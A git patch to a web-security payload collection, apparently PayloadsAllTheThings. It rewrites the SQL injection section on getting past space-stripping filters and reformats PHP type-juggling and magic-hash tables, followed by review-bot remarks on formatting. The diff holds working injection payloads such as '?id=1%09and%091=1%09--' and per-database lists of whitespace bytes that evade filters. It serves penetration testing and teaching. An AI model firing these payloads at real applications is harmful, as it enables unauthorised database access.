From 7faf14a96008b719728768e161efc32a63ee8d57 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 26 Jul 2025 22:54:45 +0200 Subject: [PATCH] SQL injection - Generic Bypass (Space) --- README.md | 3 +-- SQL Injection/README.md | 49 +++++++++++++++++++++++------------------ Type Juggling/README.md | 11 +++++---- 3 files changed, 36 insertions(+), 27 deletions(-) diff --git a/README.md b/README.md index 9f5f8758..92fdf70d 100644 --- a/README.md +++ b/README.md @@ -2,9 +2,8 @@ A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! -I :heart: pull requests :) -You can also contribute with a :beers: IRL, or using the sponsor button +You can also contribute with a :beers: IRL, or using the sponsor button. [![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo) [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 092d8136..1c284e7b 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -31,7 +31,7 @@ * [Second Order SQL Injection](#second-order-sql-injection) * [PDO Prepared Statements](#pdo-prepared-statements) * [Generic WAF Bypass](#generic-waf-bypass) - * [White Spaces](#white-spaces) + * [No Space Allowed](#no-space-allowed) * [No Comma Allowed](#no-comma-allowed) * [No Equal Allowed](#no-equal-allowed) * [Case Modification](#case-modification) 
@@ -439,30 +439,37 @@ PDO allows for binding of input parameters, which ensures that user data is prop ## Generic WAF Bypass -### White Spaces +### No Space Allowed -Bypass using whitespace alternatives. +Some web applications attempt to secure their SQL queries by blocking or stripping space characters to prevent simple SQL injection attacks. However, attackers can bypass these filters by using alternative whitespace characters, comments, or creative use of parentheses. -| Bypass | Technique | -| ------------------------ | ---------------------- | -| `?id=1%09and%091=1%09--` | Whitespace alternative | -| `?id=1%0Aand%0A1=1%0A--` | Whitespace alternative | -| `?id=1%0Band%0B1=1%0B--` | Whitespace alternative | -| `?id=1%0Cand%0C1=1%0C--` | Whitespace alternative | -| `?id=1%0Dand%0D1=1%0D--` | Whitespace alternative | -| `?id=1%A0and%A01=1%A0--` | Whitespace alternative | -| `?id=1%A0and%A01=1%A0--` | Whitespace alternative | +#### Alternative Whitespace Characters -| DBMS | ASCII characters in hexadecimal | -| ---------- | ------------------------------- | -| SQLite3 | 0A, 0D, 0C, 09, 20 | -| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 | -| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 | -| PostgreSQL | 0A, 0D, 0C, 09, 20 | -| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 | -| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 | +Most databases interpret certain ASCII control characters and encoded spaces (such as tabs, newlines, etc.) as whitespace in SQL statements. By encoding these characters, attackers can often evade space-based filters. -Bypass using comments and parenthesis. 
+| Example Payload | Description | +|-------------------------------|----------------------------------| +| `?id=1%09and%091=1%09--` | `%09` is tab (`\t`) | +| `?id=1%0Aand%0A1=1%0A--` | `%0A` is line feed (`\n`) | +| `?id=1%0Band%0B1=1%0B--` | `%0B` is vertical tab | +| `?id=1%0Cand%0C1=1%0C--` | `%0C` is form feed | +| `?id=1%0Dand%0D1=1%0D--` | `%0D` is carriage return (`\r`) | +| `?id=1%A0and%A01=1%A0--` | `%A0` is non-breaking space | + +**ASCII Whitespace Support by Database**: + +| DBMS | Supported Whitespace Characters (Hex) | +|--------------|----------------------------------------------___-| +| SQLite3 | 0A, 0D, 0C, 09, 20 | +| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 | +| MySQL 3 | 01–1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0| +| PostgreSQL | 0A, 0D, 0C, 09, 20 | +| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 | +| MSSQL | 01–1F, 20 | + +#### Bypassing with Comments and Parentheses + +SQL allows comments and grouping, which can break up keywords and queries, thus defeating space filters: | Bypass | Technique | | ----------------------------------------- | -------------------- | diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 790af15a..1a6149ad 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -27,14 +27,14 @@ | `'0010e2' == '1e3'` | true | | `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) | | `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) | -| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) | +| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) | | `'0x1234Ab' == '1193131'` | true (PHP 5.0) / false (PHP 7.0) | | `'123' == 123` | true | | `'123a' == 123` | true | | `'abc' == 0` | true | | `'' == 0 == false == NULL` | true | | `'' == 0` | true | -| `0 == false` | true | +| `0 == false` | true | | `false == NULL` | true | | `NULL == ''` | true | 
@@ -65,7 +65,7 @@ Loose Type comparisons occurs in many languages: > Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations. | Hash | "Magic" Number / String | Magic Hash | Found By / Description | -| ---- | -------------------------- |:---------------------------------------------:| -------------:| +| ---- | -------------------------- | --------------------------------------------- | -------------| | MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | | MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | 
@@ -73,7 +73,10 @@ Loose Type comparisons occurs in many languages: | MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | -| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | + +| Hash | "Magic" Number / String | Magic Hash | Found By / Description | +| ---- | -------------------------- | --------------------------------------------- | -------------| +| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Michael A. Cleverly, Michele Spagnuolo & Rogdham | | SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | | SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) | | SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083) |
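Review bot: in the `SQL Injection/README.md` hunk at `@@ -439,30 +439,37 @@`, the delimiter row of the new "ASCII Whitespace Support by Database" table, `|--------------|----------------------------------------------___-|`, contains underscores; GitHub-flavored Markdown only accepts hyphens, colons, spaces and pipes in a delimiter row, so this table will not render as a table and should be fixed to `|--------------|--------------------------------------------------|`. In the same hunk the prose says "certain ASCII control characters" and the table is titled "ASCII Whitespace Support", yet the rows list `A0` and the `7F`-`9D` range, which are outside ASCII; calling the column "whitespace bytes (hex)" and noting in the `%A0` row that whether 0xA0 reaches the server as a non-breaking space depends on how the application decodes the parameter and on the connection charset (a lone 0xA0 is not valid UTF-8) would make the reference accurate and save readers a confusing test.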
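Review bot: in the `Type Juggling/README.md` hunk at `@@ -27,14 +27,14 @@`, the only change is column padding on the `'0x01' == 1` and `0 == false` rows; while touching this table, the row `'0xABCdef' == ' 0xABCdef'` appears twice in the unchanged context directly above and one copy should be dropped.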
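Review bot: in the `Type Juggling/README.md` hunk at `@@ -73,7 +73,10 @@`, the SHA1 row is moved into a second table whose header `| Hash | "Magic" Number / String | Magic Hash | Found By / Description |` is identical to the first one, with no text in between, so the rendered page shows the same header twice for no visible reason. If the intent is to separate MD4/MD5 from the SHA family, add a short caption or subheading before the second table; otherwise keep the single table. The rewrite of the credit also drops the "Independently found by" qualifier, which is the one piece of information that row carried about its three discoverers and is worth keeping.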